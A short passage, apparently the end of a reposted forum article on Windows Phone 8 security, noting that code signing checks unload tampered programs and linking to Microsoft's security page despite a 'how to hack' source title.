Signing” will invalidate the program and unload it immediately. Starting from the phone to your protected mail message, everything is safe in Windows Phone 8. More information on the security of Windows Phone can be found at http://www.windowsphone.com/en-US/business/security-us This how to is written based on Windows Phone 8. Actual functionality might differ from device to device. Some features may not be available with pre-Windows Phone 8. Sursa: how to hack a windows phone | how to windows phone
×
×
  • Create New...